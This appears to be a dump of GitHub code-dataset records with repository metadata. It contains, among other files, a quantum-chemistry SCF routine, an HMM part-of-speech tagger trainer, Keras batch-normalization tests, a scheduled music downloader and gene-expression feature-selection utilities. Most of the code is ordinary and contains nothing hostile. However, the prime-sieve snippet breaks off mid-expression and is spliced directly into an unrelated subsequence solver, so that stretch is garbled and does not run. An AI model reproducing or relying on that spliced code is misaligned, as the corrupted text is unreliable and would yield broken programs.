{1:^10s} {2:>12s} {3:>12s}'\n .format(\"\\nIter\", \"Energy\", \"Total E\", \"Delta(E)\"))\n\n iterations = 1\n e_diff = 1\n converged = False\n while (not converged):\n\n e_last = self._energy\n\n for psi in PSI:\n\n if iterations > 1:\n # Compute new psi\n with napmo.runtime.timeblock('PSI optimization'):\n psi.optimize_psi(other_psi=PSI)\n\n # Calculate 2 body Matrix\n with napmo.runtime.timeblock('Numerical 2 body'):\n 
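# refresh the species' two-body (G) matrix numerically; it feeds build_fock() below\n                    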
psi.compute_2body(self.get('direct'))\n # psi.compute_xc()\n\n psi.build_fock()\n\n # if iterations > 2:\n # psi.F[:] = psi.convergence.damping(psi.F, psi.D)\n # else:\n # psi.convergence = napmo.Convergence(psi.F, psi.D)\n\n # solve F C = e S C\n with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n napmo.cext.wavefunction_iterate(byref(psi))\n\n for psi in PSI:\n with napmo.runtime.timeblock('Coupling ints'):\n psi.compute_coupling(PSI, direct=self.get('direct'))\n # psi.compute_cor2species(PSI)\n\n if self.get('debug'):\n print(\"Single particle energy for \" +\n psi.symbol + \":\", psi._energy + psi.pce)\n\n self.compute_energy(PSI)\n\n e_diff = self._energy - e_last\n\n if pprint:\n print('{0:<4d} {1:>12.7f} {2:>12.7f} {3:>12.7f}'.\n format(iterations, self._energy - self.pce, self._energy, e_diff))\n\n if iterations > self.get('maxiter') or np.abs(e_diff) < self.get('eps_n'):\n if iterations > 1:\n converged = True\n\n iterations += 1\n\n if self.get('debug'):\n for psi in PSI:\n psi.plot_dens(kind=\"num\")\n # plt.show()\n # plt.savefig('numeric_dens.png')\n\n def hmulti(self, PSI, pprint=True):\n \"\"\"\n Perform SCF iteration for all species in this object.\n \"\"\"\n\n if pprint:\n print('\\nStarting HYBRID Multi NSCF Calculation...')\n print('{0:5s} {1:^10s} {2:>12s} {3:>12s}'\n .format(\"\\nIter\", \"Energy\", \"Total E\", \"Delta(E)\"))\n\n iterations = 0\n e_diff = 1\n\n while (iterations < self.get('maxiter') and\n np.abs(e_diff) > self.get('eps_n')):\n\n # while (iterations < 3):\n iterations += 1\n\n e_last = self._energy\n\n if iterations > 1:\n for psi in PSI:\n psi.optimize_psi(self, PSI)\n\n for psi in PSI:\n\n # Calculate 2 body Matrix\n psi.compute_2body(self.get('direct'))\n # psi.compute_xc()\n psi.build_fock()\n\n if iterations > 2:\n psi.F[:] = psi.convergence.damping(psi.F, psi.D)\n else:\n psi.convergence = napmo.Convergence(psi.F, psi.D)\n\n # solve F C = e S C\n with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n napmo.cext.wavefunction_iterate(byref(psi))\n\n with napmo.runtime.timeblock('Coupling ints'):\n psi.compute_coupling(PSI, direct=self.get('direct'))\n # psi.compute_cor2species(PSI)\n\n if psi.symbol == 'e-':\n self.nsingle(psi, pprint=False)\n\n if self.get('debug'):\n print(\n \"Single particle energy for \" +\n psi.symbol + \":\", psi._energy + psi.pce)\n\n self.compute_energy(PSI)\n\n e_diff = self._energy - e_last\n\n if pprint:\n print('{0:<4d} {1:>12.7f} {2:>12.7f} {3:>12.7f} {4:>12s}'.\n format(iterations, self._energy - self.pce, self._energy, e_diff, str([str(psi._rmsd) for psi in PSI])))\n\n if self.get('debug'):\n for psi in PSI:\n psi.plot_dens(kind=\"num\")\n # plt.show()\n # plt.savefig('numeric_dens.png')\n\n def compute_energy_single(self, psi, show=False):\n \"\"\"\n Computes the total energy for a single species system.\n \"\"\"\n\n energy = (psi.D.T * (psi.H + 0.5 * psi.G + psi.J)).sum() + psi._xc_energy + self.pce\n\n if show:\n print(\"Symbol :\", psi.symbol)\n print(\"T : {0:>18.14f}\".format((psi.D.T * psi.T).sum()))\n print(\"V : {0:>18.14f}\".format((psi.D.T * psi.V).sum()))\n print(\"2body : {0:>18.14f}\".format((psi.D.T * 0.5 * psi.G).sum()))\n print(\"Coupling: {0:>18.14f}\".format((psi.D.T * psi.J).sum()))\n print(\"XC : {0:>18.14f}\".format(psi._xc_energy))\n print(\"Total E : {0:>18.14f}\".format(energy))\n\n return energy\n\n def compute_energy(self, PSI):\n \"\"\"\n Computes the total energy for a multi-species system.\n \"\"\"\n\n self._energy = 0.0\n self._coupling_energy = 0.0\n self._xc_energy = 
0.0\n\n for psi in PSI:\n # Add independent particle energies\n self._energy += (psi.D.T * (psi.H + (0.5 * psi.G))).sum()\n\n # Calculate coupling energy\n self._coupling_energy += 0.5 * (psi.D.T * psi.J).sum()\n\n # Calculate XC energy\n self._xc_energy += psi._xc_energy\n\n # Add point charges energy\n self._energy += self.pce\n\n # Add coupling Energy\n self._energy += self._coupling_energy\n\n # Add XC energy\n self._energy += self._xc_energy\n\n def compute_energy_components(self, PSI):\n \"\"\"\n Computes the total energy for a multi-species system.\n \"\"\"\n self._kinetic_energy = 0.0\n self._1body_energy = 0.0\n self._pcqui_energy = 0.0\n self._2body_energy = 0.0\n self._coupling_energy = 0.0\n self._xc_energy = 0.0\n\n for psi in PSI:\n # Calculate kinetic energy\n self._kinetic_energy += (psi.D * psi.T).sum()\n\n # Calculate one body energy\n self._1body_energy += (psi.D * psi.H).sum()\n\n # Calculate point charges - quantum interaction energy\n self._pcqui_energy += (psi.D * psi.V).sum()\n\n # Calculate repulsion energy\n self._2body_energy += 0.5 * (psi.D * psi.G).sum()\n\n # Calculate coupling energy\n self._coupling_energy += 0.5 * (psi.D * psi.J).sum()\n\n # Calculate exchange correlation energy\n self._xc_energy += psi._xc_energy\n\n # Calculate potential energy\n self._potential_energy = (self.pce +\n self._2body_energy +\n self._pcqui_energy +\n self._coupling_energy +\n self._xc_energy)\n\n self._energy = self._potential_energy + self._kinetic_energy\n\n def get(self, key, default=None):\n \"\"\"\n Returns the option ``key`` of the SCF object\n \"\"\"\n return self.options.get(key, default)\n\n @property\n def pce(self):\n \"\"\"\n The point charges energy\n \"\"\"\n return self._pce\n\n @property\n def energy(self):\n \"\"\"\n The total energy\n \"\"\"\n return self._energy\n\n def show_results(self, PSI):\n \"\"\"\n Prints detailed results of the calculation\n \"\"\"\n self.compute_energy_components(PSI)\n\n print(\"\"\"\\n\nEnd SCF calculation\n--------------------------------------------------\n\nHartree-Fock Results:\n---------------------\n\n Total potential energy {0:>16.11f}\n Total kinetic energy {1:>16.11f}\n -----------------\n Total Energy {2:>16.11f}\n\n Virial ratio (V/T) {3:>16.11f}\n\n Potential energy components:\n\n Point charges energy {4:>16.11f}\n Quantum-Point energy {5:>16.11f}\n Repulsion energy {6:>16.11f}\n Coupling energy {7:>16.11f}\n Exc. corr. energy {8:>16.11f}\n -----------------\n Potential energy {9:>16.11f}\n\n\"\"\".format(self._potential_energy,\n self._kinetic_energy,\n self._potential_energy + self._kinetic_energy,\n np.abs(self._potential_energy / self._kinetic_energy),\n self.pce,\n self._pcqui_energy,\n self._2body_energy,\n self._coupling_energy,\n self._xc_energy,\n self._potential_energy))\n\n # for psi in PSI:\n # print(\"Orbitals: \", psi.symbol, \"\\n\", psi.O, \"\\n\")\n # print(\"Kinetic energy: \", psi.symbol, (psi.D * psi.T).sum())\n # print(\"Quantum-Point energy: \", psi.symbol, (psi.D * psi.V).sum())\n # print(\"Repulsion energy: \", psi.symbol, 0.5 * (psi.D * psi.G).sum())\n # print(\"Coupling energy: \", psi.symbol, 0.5 * (psi.D * psi.J).sum())\n # print(\"Exc. Corr. 
energy (fix): \", psi.symbol, psi._xc_energy, \"\\n\")\n\n def __repr__(self):\n out = (\"\"\"\\nSCF setup:\n\nMethod: {0:<10s}\nKind: {1:<10s}\nDirect: {2:<10s}\nE Tol: {3:<10.3e}\nDens Tol: {4:<10.3e}\nE Tol NUM: {5:<10.3e}\n\"\"\".format(self.get('method'),\n self.get('kind'),\n str(self.get('direct')),\n self.get('eps_e'),\n self.get('eps_d'),\n self.get('eps_n')\n ))\n\n return out\n","repo_name":"efposadac/nAPMO","sub_path":"napmo/scf/scf.py","file_name":"scf.py","file_ext":"py","file_size_in_byte":20955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"7206971517","text":"'''\r\n @author: Pranshu Aggarwal\r\n @problem: https://hack.codingblocks.com/app/practice/1/67/problem\r\n'''\r\nMAX_SIZE = 1000005\r\nprimes = [0,2]\r\ndef sieve_of_eratosthenes():\r\n temp = [True if x%2 else False for x in range(0,MAX_SIZE)]\r\n temp[1], temp[2] = False, True\r\n for i in range(3, MAX_SIZE, 2):\r\n if(i*i a[i]:\n opt[2][i] = max(opt[2][i], 1 + max(opt[1][j], opt[2][j]))\n if j < i and a[j] < a[i]:\n opt[3][i] = max(opt[3][i], 1 + max(opt[2][j], opt[3][j]))\n # print(opt)\n if max(opt[2]) <= 0 or max(opt[3]) <= 0:\n return -math.inf\n return max(max(opt[1]), max(opt[2]), max(opt[3]))\n\n\nin_count = int(input())\nin_list = [0 for _ in range(in_count+2)]\nfor i in range(1, in_count+1):\n in_list[i] = int(input())\nprint(in_list)\nprint(f\"Length of longest N-shaped subsequence = {max_n_shaped_subseq(in_list)}\")\n","repo_name":"jvk36/UB-CSE-JV-CSE-331","sub_path":"hw_4_4_longest_N_shaped_subsequence/n_shaped_subseq.py","file_name":"n_shaped_subseq.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10220847517","text":"#HMM POS Tagger for Catalan\nimport io\nfrom collections import defaultdict\nimport sys\nimport copy\n\n#file_path = sys.argv[1]\n#print file_path\n#lines = [line.rstrip('\\n') for line in open(file_path)]\n\ntransition_dict = {} #of the form: {q0: {{NN:2}. 
{VB,4}}....}\nemission_dict = {}\ntrasition_count = {}\nemission_count = {}\ntransition_prob = {}\nemission_prob = {}\nlast = {}\npossible_tags_dict = {}\n\n\ninput_path=\"hmm_train.txt\"\nwith open(input_path, \"r\") as training_data:\n for line in training_data:\n tokens = line.split()\n # print \"\\n\"\n # print(tokens)\n prev=\"q0\"\n \n #trasition_count[prev] += 1\n \n\n for token in tokens:\n\n if prev not in transition_dict:\n transition_dict[prev] = {}\n #print \"make new tag entry for prev\" + prev\n\n len_of_token=len(token)\n #print(token)\n #print(len_of_token)\n word=token[0:len_of_token-3]\n tag=token[len_of_token-2:len_of_token]\n # print \"WORD: \" + word\n # print \"TAG: \" + tag\n # print \"PREV: \" + prev\n\n if tag not in emission_dict:\n emission_dict[tag] = {}\n \n \n\n if trasition_count.has_key(prev):\n trasition_count[prev] += 1 \n else:\n trasition_count[prev] = 1\n\n \n if tag in transition_dict[prev]:\n transition_dict[prev][tag] += 1\n else:\n transition_dict[prev][tag] = 1\n\n\n if word in possible_tags_dict:\n possible_tags_dict[word].add(tag)\n else:\n possible_tags_dict[word] = set()\n possible_tags_dict[word].add(tag)\n\n\n if word in emission_dict[tag]:\n emission_dict[tag][word] += 1\n else:\n emission_dict[tag][word] = 1\n\n \n prev = tag\n #store the last tags\n if last.has_key(prev):\n last[prev]=last[prev]+1\n else:\n last[prev] = 1\n\n\n\n\n# print transition_dict \n# print \"\\n\"\n# print trasition_count\n# print \"\\n\"\n# print emission_dict\n# print \"\\n\"\n# print last\n# print \"\\n\"\n\nemission_count = copy.deepcopy(trasition_count)\n\nfor t in last:\n if t in trasition_count:\n emission_count[t] += last[t]\n\n else:\n if t not in emission_count:\n emission_count[t] = last[t]\n else:\n emission_count[t] += last[t]\n\n \n\n\n# print trasition_count\n# print \"\\n\"\n# print emission_count\n# print \"\\n\"\n\nlen_transition_dict = 0\nlen_emission_dict = 0\n\nf = open('hmmmodel.txt','wb')\nlen_of_trans_count = len(trasition_count)\n# print \"\\n TRns count \"\n# print len_of_trans_count \n\n#f.write('Transmition\\n')\n\nfor prev1 in transition_dict:\n for tag1 in transition_dict[prev1]:\n #print prev1, tag1\n if prev1 not in transition_prob:\n transition_prob[prev1] = {}\n transition_prob[prev1][tag1] = (float)((1 + (float)(transition_dict[prev1][tag1])) / ((float)(trasition_count[prev1]) + len_of_trans_count)) #add 1 smoothing\n\n #(no. of transitions from prev1->tag1)/(no. of prev1 tags)\n len_transition_dict += 1\n \n transition_prob[prev1]['qX'] = 1 / (((float)(trasition_count[prev1]) + len_of_trans_count))\n#print transition_prob\n\n#len_transition_dict = len(transition_dict)\n# print \"\\n Length of transition dict: \" + str(len_transition_dict + len_of_trans_count)\n\nf.write(str(len_transition_dict + len_of_trans_count) + \"\\n\")\n\nfor prev1 in transition_dict:\n for tag1 in transition_dict[prev1]:\n s = prev1 +'\\t'+ tag1 + '\\t' + str(transition_prob[prev1][tag1]);\n f.write(s+\"\\n\")\n s = prev1 + '\\t'+ 'qX' + '\\t' + str(transition_prob[prev1]['qX']);\n f.write(s+\"\\n\")\n\n\n\n#f.write('Emission\\n')\n\nfor tag2 in emission_dict:\n for word2 in emission_dict[tag2]:\n #print prev1, tag1\n if tag2 not in emission_prob:\n emission_prob[tag2] = {}\n emission_prob[tag2][word2] = (float)((float)(emission_dict[tag2][word2]) / emission_count[tag2])\n #(no. of transitions from prev1->tag1)/(no. 
of prev1 tags)\n len_emission_dict += 1\n \n \n#len_emission_dict = len(emission_dict)\n# print \"\\n Length of emission dict: \" + str(len_emission_dict)\n\nf.write(str(len_emission_dict) + \"\\n\")\n\nfor tag2 in emission_dict:\n for word2 in emission_dict[tag2]:\n s = tag2 +'\\t'+ word2 + '\\t' + str(emission_prob[tag2][word2]);\n f.write(s+\"\\n\")\n\nfor key, value in possible_tags_dict.iteritems():\n f.write(key+' ')\n for all_tags in value:\n f.write(all_tags+' ')\n f.write('\\n')\n\n\n\n# print transition_prob\n# print emission_prob\n# print possible_tags_dict","repo_name":"Maithili2412/NLP","sub_path":"Hidden Markov Model/hmmlearn.py","file_name":"hmmlearn.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18122725206","text":"# cibele\nfrom _spy.vitollino.main import Cena, Elemento,Texto\nlinkDoGato =\"https://vignette.wikia.nocookie.net/character-stats-and-profiles/images/0/09/Garfield.png/revision/latest?cb=20170701143047\"\ndef Historia():\n\tcenaHouse = Cena (img = \"https://www.simsnetwork.com/sites/simsnetwork.com/files/styles/box-downloads/public/20140218-downloads-arbuckle-03.jpg?itok=TcZfhuU-\")\n\tgato = Elemento (img = linkDoGato,\n tit=\"Garfield\",\n style=dict(left=150, top=60, width=60, height=200))\n\tgato.entra(cenaHouse)\n\ttxtGato = Texto (cenaHouse, \"Hello\")\n\tgato.vai = txtGato.vai\n\tcenaHouse.vai()\nHistoria()","repo_name":"kwarwp/eva","sub_path":"callie/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14105619084","text":"class Solution:\n def findSmallestSetOfVertices(self, n: int, edges: List[List[int]]) -> List[int]:\n arr = [0] * n\n for a, b in edges:\n arr[b] +=1\n ans = []\n for i in range(len(arr)):\n if arr[i] == 0:\n ans.append(i)\n return ans","repo_name":"Sol-cito/LeetCoding","sub_path":"1557-minimum-number-of-vertices-to-reach-all-nodes/1557-minimum-number-of-vertices-to-reach-all-nodes.py","file_name":"1557-minimum-number-of-vertices-to-reach-all-nodes.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31161685265","text":"import schedule\r\n\r\nimport time\r\n\r\nimport request\r\nfrom download import download_start\r\nfrom alpha import Variables\r\nfrom alpha import BColors\r\n\r\n\r\nclass Musics:\r\n \"\"\"Music link storage\"\"\"\r\n musics = []\r\n melon_last_music = 0 # 마지막으로 재생한 멜론차트 순위를 기억\r\n\r\n\r\ndef init():\r\n \"\"\"Starts initialization\"\"\"\r\n print('\\n--ALL DONE--\\n\\n')\r\n Musics.musics = []\r\n print(Variables.schedule_time + \"에 재생 예정\")\r\n\r\n\r\ndef get_urls(amount, request_type, end):\r\n for i in range(0, amount):\r\n try:\r\n if request_type == 0:\r\n Musics.musics.append(request.link_request(i))\r\n else:\r\n Musics.musics.append(request.melon_request(i + end))\r\n Musics.melon_last_music += 1\r\n\r\n except IndexError:\r\n print(f'{BColors.WARNING}but playing only {len(Musics.musics)}{BColors.END}', end='')\r\n break\r\n\r\n except Exception as e:\r\n print(f'{BColors.WARNING}but Connection {BColors.FAIL}Failed{BColors.END}', end=' ')\r\n print('( ' + str(e), end=' )\\n\\n')\r\n if request_type == 0:\r\n print('Recovery System starting..')\r\n else:\r\n Musics.musics = []\r\n return\r\n print('\\n------------------------------------------------')\r\n return 
'Success'\r\n\r\n\r\ndef execute(file_dir, amount: int):\r\n \"\"\"Starts at Scheduled Time\"\"\"\r\n week = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\r\n wday = time.localtime().tm_wday\r\n #wday = 0\r\n print('[' + week[wday] + ']')\r\n print('Checking api link: ', end='')\r\n try:\r\n request.link_request(1)\r\n except IndexError:\r\n init()\r\n return\r\n print(f'{BColors.GREEN}Success{BColors.END}\\n')\r\n if wday == 5:\r\n print('waiting 20min')\r\n time.sleep(1200)\r\n elif wday == 6:\r\n print('waiting 60min')\r\n time.sleep(3600)\r\n\r\n print(f'Trying to play {amount} musics', end=' ')\r\n if Musics.melon_last_music > 30: # 멜론에서 마지막으로 재생한 노래가 30번째가 넘어간다면 초기화\r\n Musics.melon_last_music = 0\r\n last_played = Musics.melon_last_music\r\n for i in range(0, 2):\r\n is_success = get_urls(amount, i, last_played)\r\n if is_success == 'Success':\r\n break\r\n\r\n for i in Musics.musics:\r\n for j in range(0, Variables.max_retry+1):\r\n try:\r\n is_success = download_start(file_dir, i)\r\n if is_success is False:\r\n init()\r\n return\r\n break\r\n\r\n except Exception as e:\r\n print(e.args)\r\n\r\n if j == Variables.max_retry:\r\n init()\r\n return print(f\"{BColors.FAIL}Critical Fail{BColors.END}\")\r\n\r\n time.sleep(1)\r\n print(f\"{BColors.WARNING}Progress Failed!{BColors.END}\", end=\" \")\r\n print(f\"{BColors.WARNING}retrying in 10 sec{BColors.END}\")\r\n time.sleep(10)\r\n print('\\n------------------------------------------------')\r\n init()\r\n\r\n\r\ndef before_execute():\r\n \"\"\"Executes Function 'execute' with Parameters\"\"\"\r\n execute(Variables.FILE_DIR, Variables.play_song_amount)\r\n\r\n\r\nif Variables.IS_os_WINDOWS is True:\r\n if not Variables.FILE_DIR.endswith(\"\\\\\"):\r\n Variables.FILE_DIR += \"\\\\\"\r\nelse:\r\n if not Variables.FILE_DIR.endswith(\"/\"):\r\n Variables.FILE_DIR += \"/\"\r\n\r\nschedule.every().day.at(Variables.schedule_time).do(before_execute)\r\nprint(BColors.GREEN + \"파일 경로: \" + Variables.FILE_DIR + BColors.END)\r\nprint(Variables.schedule_time + \"에 재생 예정\")\r\n\r\nwhile True:\r\n schedule.run_pending()\r\n time.sleep(0.1)\r\n","repo_name":"siwonKH/Wakeup-Music-Player","sub_path":"mornin-V4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36180746442","text":"import unittest\nimport numpy as np\nfrom numpy.testing import assert_allclose\nfrom theano import tensor as T\nfrom keras.layers import normalization\n\nclass TestBatchNormalization(unittest.TestCase):\n def setUp(self):\n self.input_1 = np.arange(10)\n self.input_2 = np.zeros(10)\n self.input_3 = np.ones((10))\n\n self.input_shapes = [np.ones((10,10)), np.ones((10,10,10))]\n\n def test_setup(self):\n norm_m0 = normalization.BatchNormalization((10,10))\n norm_m1 = normalization.BatchNormalization((10,10), mode=1)\n\n # mode 3 does not exist\n self.assertRaises(Exception,normalization.BatchNormalization((10,10),mode=3))\n\n def test_mode_0(self):\n \"\"\"\n Test the function of mode 0. 
Need to be somewhat lenient with the\n equality assertions because of the epsilon trick used to avoid NaNs.\n \"\"\"\n norm_m0 = normalization.BatchNormalization((10,), momentum=0.5)\n\n norm_m0.input = self.input_1\n out = (norm_m0.get_output(train=True) - norm_m0.beta)/norm_m0.gamma\n self.assertAlmostEqual(out.mean().eval(), 0.0)\n self.assertAlmostEqual(out.std().eval(), 1.0, places=2)\n\n self.assertAlmostEqual(norm_m0.running_mean, 4.5)\n self.assertAlmostEqual(norm_m0.running_std.eval(), np.arange(10).std(), places=2)\n\n norm_m0.input = self.input_2\n out = (norm_m0.get_output(train=True) - norm_m0.beta)/norm_m0.gamma\n self.assertAlmostEqual(out.mean().eval(), 0.0)\n self.assertAlmostEqual(out.std().eval(), 0.0, places=2)\n\n #Values calculated by hand\n self.assertAlmostEqual(norm_m0.running_mean, 2.25)\n self.assertAlmostEqual(norm_m0.running_std.eval(), 0.5*np.arange(10).std(), places=2)\n\n out_test = (norm_m0.get_output(train=False) - norm_m0.beta)/norm_m0.gamma\n self.assertAlmostEqual(out_test.mean().eval(), -2.25 / (0.5*np.arange(10).std()),places=2)\n self.assertAlmostEqual(out_test.std().eval(), 0.0, places=2)\n\n norm_m0.input = self.input_3\n out = (norm_m0.get_output(train=True) - norm_m0.beta)/norm_m0.gamma\n self.assertAlmostEqual(out.mean().eval(), 0.0)\n self.assertAlmostEqual(out.std().eval(), 0.0, places=2)\n\n def test_mode_1(self):\n norm_m1 = normalization.BatchNormalization((10,), mode=1)\n\n for inp in [self.input_1, self.input_2, self.input_3]:\n norm_m1.input = inp\n out = (norm_m1.get_output(train=True) - norm_m1.beta)/norm_m1.gamma\n self.assertAlmostEqual(out.mean().eval(), 0.0)\n if inp.std() > 0.:\n self.assertAlmostEqual(out.std().eval(), 1.0, places=2)\n else:\n self.assertAlmostEqual(out.std().eval(), 0.0, places=2)\n\n def test_shapes(self):\n \"\"\"\n Test batch normalization with various input shapes\n \"\"\"\n for inp in self.input_shapes:\n norm_m0 = normalization.BatchNormalization(inp.shape, mode=0)\n norm_m0.input = inp\n out = (norm_m0.get_output(train=True) - norm_m0.beta)/norm_m0.gamma\n\n norm_m1 = normalization.BatchNormalization(inp.shape, mode=1)\n norm_m1.input = inp\n out = (norm_m1.get_output(train=True) - norm_m1.beta)/norm_m1.gamma\n\n def test_weight_init(self):\n \"\"\"\n Test weight initialization\n \"\"\"\n\n norm_m1 = normalization.BatchNormalization((10,), mode=1, weights=[np.ones(10),np.ones(10)])\n\n for inp in [self.input_1, self.input_2, self.input_3]:\n norm_m1.input = inp\n out = (norm_m1.get_output(train=True) - np.ones(10))/1.\n self.assertAlmostEqual(out.mean().eval(), 0.0)\n if inp.std() > 0.:\n self.assertAlmostEqual(out.std().eval(), 1.0, places=2)\n else:\n self.assertAlmostEqual(out.std().eval(), 0.0, places=2)\n\n assert_allclose(norm_m1.gamma.eval(),np.ones(10))\n assert_allclose(norm_m1.beta.eval(),np.ones(10))\n\n #Weights must be an iterable of gamma AND beta.\n self.assertRaises(Exception,normalization.BatchNormalization(10,), weights = np.ones(10))\n\n\n def test_config(self):\n norm = normalization.BatchNormalization((10,10), mode=1, epsilon=0.1)\n conf = norm.get_config()\n conf_target = {\"input_shape\": (10,10), \"name\": normalization.BatchNormalization.__name__,\n \"epsilon\":0.1, \"mode\": 1}\n\n self.assertDictEqual(conf, conf_target)\n\n\nif __name__ == '__main__':\n 
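# run every TestBatchNormalization case defined in this module\n    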
unittest.main()\n","repo_name":"lllcho/CAPTCHA-breaking","sub_path":"keras-master/tests/auto/keras/test_normalization.py","file_name":"test_normalization.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"61"} +{"seq_id":"13619799771","text":"import configparser\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics\nfrom sklearn.metrics import make_scorer\nfrom tqdm import tqdm\n\n\ndef read_genes_from_folder(lookup_dir):\n \"\"\"\n Description: Reading gene expression data from specified directory.\n The directory contains one .txt file for each case_id (patient).\n Each .txt file contains the gene expression values (features) for one specific case_id.\n\n :param lookup_dir: Path\n directory containing gene expression data\n :return df_patients: DataFrame, shape = [n_samples, n_features],\n where n_samples is the number of samples and n_features is the number of features.\n - DataFrame.columns: contains the gene names\n - DataFrame.index: contains the case_ids\n :return y: array-like, shape = [n_samples]\n labels (0/1)\n \"\"\"\n X = pd.DataFrame()\n y = []\n for file_name in tqdm(os.listdir(lookup_dir), desc=\">> Reading genes data...\", file=sys.stdout):\n file_path = os.path.join(lookup_dir, file_name)\n with open(file_path) as f:\n patient_df = pd.read_csv(f, sep=\"\\t\", header=None, index_col=0, names=[file_name.replace(\".txt\", \"\")])\n patient_df = pd.DataFrame.transpose(patient_df)\n X = X.append(patient_df)\n y.append(0 if file_name.endswith(\"_0.txt\") else 1)\n\n return X, y\n\n\ndef load_selected_genes(selected_features_dir):\n \"\"\"\n Description: Reading gene expression values (features) of genes selected by feature selection method.\n The directory contains one .npy file for each case_id (patient).\n Each .npy file contains the gene expression values for one specific case_id.\n\n :param selected_features_dir: Path\n directory containing the gene expression data\n :returns X: 2D-numpy array, shape = [n_samples, n_selected_features],\n where n_samples is the number of samples and n_selected_features is the number of selected features\n :return y: array-like, shape = [n_samples]\n labels (0/1)\n :return targets: array-like, shape = [n_samples]\n case_ids\n \"\"\"\n X = []\n y = []\n case_ids = []\n for patient_file in tqdm(os.listdir(selected_features_dir), desc=\">> Reading selected genes...\", file=sys.stdout):\n patient_features = np.load(os.path.join(selected_features_dir, patient_file))\n case_id = os.path.splitext(patient_file)[0]\n target = case_id[-1:]\n case_ids.append(case_id)\n X.append(patient_features)\n y.append(int(target))\n\n X = np.asarray(X)\n return X, y, case_ids\n\n\ndef save_selected_genes(X, extracted_features_dir):\n \"\"\"\n Description: Saving to disk gene expression values of genes selected by feature selection algorithm.\n The directory contains one .npy file for each case_id (patient).\n Each .npy file contains the gene expression values for one specific case_id.\n\n :param X: DataFrame, shape = [n_samples, n_selected_features],\n where n_samples is the number of samples and n_features is the number of selected features.\n :param extracted_features_dir: Path\n directory to save gene expression data\n \"\"\"\n\n for index, row in X.iterrows():\n row = np.asarray(row)\n np.save(os.path.join(extracted_features_dir, index + '.npy'), row)\n\n print(\">> Features saved to \" + str(extracted_features_dir))\n\n\ndef 
read_config_file(config_file_path, section):\n \"\"\"\n Description: Reading configuration file for genes\n :param config_file_path: Path\n configuration file\n :param section: String\n configuration file section\n :return params: Dictionary\n configuration file parameters\n \"\"\"\n params = {}\n config = configparser.ConfigParser()\n config.read(config_file_path)\n\n params['random_state'] = config.getint('general', 'random_state')\n params['sampling_strategy'] = config.getfloat('general', 'sampling_strategy')\n params['smote'] = config.getboolean('general', 'smote')\n\n if section == 'svm_t_rfe':\n params['alpha'] = config.getfloat('svm_t_rfe', 'alpha')\n params['theta'] = config.getfloat('svm_t_rfe', 'theta')\n params['cv_grid_search_rank'] = config.getint('svm_t_rfe', 'cv_grid_search_rank')\n params['cv_grid_search_acc'] = config.getint('svm_t_rfe', 'cv_grid_search_acc')\n params['cv_outer'] = config.getint('svm_t_rfe', 'cv_outer')\n params['top_ranked'] = config.getint('svm_t_rfe', 'top_ranked')\n params['t_stat_threshold'] = config.getfloat('svm_t_rfe', 't_stat_threshold')\n params['scoring_name'] = config['svm_t_rfe']['scoring']\n params['num_selected_genes'] = config.getint('svm_t_rfe', 'num_selected_genes')\n\n if config['svm_t_rfe']['scoring'] == 'accuracy':\n params['scoring'] = make_scorer(metrics.accuracy_score)\n elif config['svm_t_rfe']['scoring'] == 'matthew_coeff':\n params['scoring'] = make_scorer(metrics.matthews_corrcoef)\n elif config['svm_t_rfe']['scoring'] == 'auc':\n params['scoring'] = make_scorer(metrics.roc_auc_score)\n else:\n sys.stderr.write(\"Invalid value for in config file\")\n exit(1)\n\n if config['svm_t_rfe']['kernel'] == 'linear' or config['svm_t_rfe']['kernel'] == 'rbf':\n params['kernel'] = config['svm_t_rfe']['kernel']\n else:\n sys.stderr.write(\"Invalid value for in config file\")\n exit(1)\n elif section == 'svm':\n params['cv_grid_search_acc'] = config.getint('svm', 'cv_grid_search_acc')\n params['scoring_name'] = config['svm']['scoring']\n\n if config['svm']['kernel'] == 'linear' or config['svm']['kernel'] == 'rbf':\n params['kernel'] = config['svm']['kernel']\n else:\n sys.stderr.write(\"Invalid value for in config file\")\n exit(1)\n if config['svm']['scoring'] == 'accuracy':\n params['scoring'] = make_scorer(metrics.accuracy_score)\n elif config['svm']['scoring'] == 'recall':\n params['scoring'] = make_scorer(metrics.recall_score)\n else:\n sys.stderr.write(\"Invalid value for in config file\")\n exit(1)\n\n elif section == 'perceptron':\n params['cv_grid_search_acc'] = config.getint('perceptron', 'cv_grid_search_acc')\n params['scoring_name'] = config['perceptron']['scoring']\n\n if config['perceptron']['scoring'] == 'accuracy':\n params['scoring'] = make_scorer(metrics.accuracy_score)\n elif config['perceptron']['scoring'] == 'recall':\n params['scoring'] = make_scorer(metrics.recall_score)\n else:\n sys.stderr.write(\"Invalid value for in config file\")\n exit(1)\n\n elif section == 'sgd_classifier':\n params['cv_grid_search_acc'] = config.getint('sgd_classifier', 'cv_grid_search_acc')\n params['scoring_name'] = config['sgd_classifier']['scoring']\n\n if config['sgd_classifier']['scoring'] == 'accuracy':\n params['scoring'] = make_scorer(metrics.accuracy_score)\n elif config['sgd_classifier']['scoring'] == 'recall':\n params['scoring'] = make_scorer(metrics.recall_score)\n else:\n sys.stderr.write(\"Invalid value for in config file\")\n exit(1)\n\n else:\n sys.stderr.write(\"Invalid value for
